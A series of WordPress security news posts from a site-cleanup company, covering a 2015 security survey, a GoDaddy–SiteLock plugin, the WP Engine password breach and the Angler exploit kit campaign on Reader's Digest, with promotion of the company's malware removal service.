WordPress Security: 2015 in Review

Another day, another year and 2015 is drawing to a close. It’s been an interesting year with Donald Trump making waves in the presidential elections, and finishing off with Steve Harvey crowning the wrong Miss Universe! 2015 is a year to remember. In the midst of the holiday cheer, it’s also the time to reflect back on the past year to learn and grow from our mistakes.

By mistakes, we mean lapses in your WordPress security — not on how you need to start hitting gym! With WordPress attacks on the rise, it’s more important than ever to keep your site safe and beware of some common pitfalls. Only last month, data security firm Imperva confirmed in their WAAR Report 2015 that WordPress has been the victim 3.5 times more than other Content Management Systems.

WordFence has released the results of their first annual WordPress Security Survey. A large sample of 7,375 WordPress users took part in the survey revealing data of security behaviour of WordPress users, from those with little to no experience to total experts.

Of the respondents, 38.9% admitted to being a victim of a WordPress attack in the past year. It appears that a majority of the victims were not proactively scanning their site for viruses but rather stumbled upon it. Over 35% of the sample said that they were alerted to their site being compromised while visiting their site. Around 27% said that their hosting provider took their site offline and 26% were contacted by a customer.

Although more than half of WordPress users find their income greatly affected when their site goes compromised, it appears from the survey results that expert users were far more concerned about site security than advanced and intermediate users.

Plugins often make it to the news for creating vulnerabilities in the site’s defense system, yet interestingly the survey found that the most used plugin type installed was a security plugin. It was closely followed by contact form, SEO and anti-spam plugins.

As a site owner, it’s your responsibility to keep your site well protected. Use these 4 simple ways to protect your site from ever getting compromised.

Merry Christmas and a Happy New Year from everybody at WPSOS! See you next year ;)

GoDaddy and SiteLock Partner to Add Security to Small Business WordPress Sites

It seems like very week there are new reports of security attacks on WordPress sites, and according to recent reports the numbers are just getting higher. GoDaddy, the highly popular domain registrar and web hosting company, has decided to add extra security to WordPress sites owned by small business owners. The company has partnered with SiteLock, a website security provider, to reduce security vulnerabilities and attacks.

The two companies which have been working together since April 2014, have announced a new plugin keeping web developers and designers in mind. With just one click, businesses will be able to access and understand their website security situation. Without having to leave your website, the plugin gives you an at-a-glance view of security scan results within the WordPress dashboard.

“This brought their security information to the forefront in WordPress so they can manage their portfolio of websites without having to ever leave the WordPress site,” SiteLock President Feather said. “They can scan to make sure it’s free of malware and can do all this within one interface. It’s a powerful tool for them because it enables them to do it in real time as they’re working and adding features to their site.”

Other features include security scans on WordPress pages in draft mode and real-time updates to resolve threats with minimal latency between the time they are identified and resolved. The plugin can also recognize specific vulnerabilities and quickly resolve them on its own.

Tom Serani, SiteLock Executive Vice President of Business Development, said, “As the hosting space continues to evolve, we wanted to offer a strategic solution through a trusted small business advisor and partner like GoDaddy. We worked together to make it easy for customers to seamlessly integrate security into their sites.”

Users can use one set of log-in credentials through the plugin to access and manage both their GoDaddy account and SiteLock information.

WP Engine Suffers Security Breach

WP Engine has suffered a major security breach it forcing to reset over 30,000 customers’ passwords. On Tuesday, the WordPress hosting outfit confessed to the hack attack. It posted recommendations on resetting passwords with updated step-by-step links on how to do it.

WP Engine is a Hosted service provider, which manages WordPress hosting for mission critical sites around the world. Set up by WordPress to better support the giant web publishing platform, it had stayed clear of any security vulnerabilities — unlike WordPress and its themes- up till now.

In an urgent security notification on its site, WP Engine announced the security breach. They said, “At WP Engine we are committed to providing robust security. We are writing today to let you know that we learned of an exposure involving some of our customers’ credentials. Out of an abundance of caution, we are proactively taking security measures across our entire customer base.”

“We have begun an investigation, however there is immediate action we are taking. Additionally, there is action that requires your immediate attention” said the WP Engine Team, referring to the resetting of passwords. “While we have no evidence that the information was used inappropriately, as a precaution, we are invalidating the following five passwords associated with your WP Engine account. This means you will need to reset each of them.”

The firm immediately reached out to its clients informing them of the attack and on how to guard their accounts. Users with an account at WP Engine should change their password and keep a watchful eye over email comings and goings, as well as, their financial transactions.

WP Engine apologized for the attack, “We apologize for any inconvenience this event may have caused. We are taking this exposure as an opportunity to review and enhance our security, and remain committed to strong internal security practices and processes.”

Breaking News: Reader’s Digest and other WordPress sites are compromised

A large number of Internet users have been infected via the Angler exploit kit, after visiting compromised sites in the past week. The hacking campaign has been pushed from many WordPress sites, most notably that of Reader’s Digest — the popular, monthly family magazine.

According to security blog, Malwarebytes, the attack consists of compromised WordPress sites injected with malicious script that launches another URL whose final purpose is to load the Angler exploit kit. Owners of attacked WordPress sites should remember that although the injected scripts and URL’s follow the same pattern, they vary over time.

In the initial investigation by Malwarebyte, it was found that the Necurs backdoor trojan is loaded on the computer of visitors to the infected sites, delivered by the Bedep trojan via the uploaded Angler Exploiter Kit. If you have visited Reader’s Digest or any other compromised site, run a security scan on your computer.

But if you are one of the infected sites, then don’t hesitate in contacting us. It is our specialty to clean up all malware and hacker attacks on WordPress sites. We have a highly experienced team who have seen all kinds of viruses and malware, and effectively dealt with them.

In an email to SCMagazine on Tuesday, Reader’s Digest spokesperson Pauli Cohen said, “We became aware of the malware attack last week and have been working with our security provider, technology partners and platform provider to investigate the issue and perform extensive security checks on our website. At this point, we are addressing all known vulnerabilities of the site. We take security very seriously and are taking every step to ensure the integrity of our site.”

Although it is our specialty to help restore security to hacked WordPress sites, we believe it is always important to guard yourself against an attack in the first place. Getting your site back up and running is no problem for us. However once you’ve realized that your site has been hacked, then give us a call at +1 (650) 600‑1970 as soon as possible to mitigate the damage.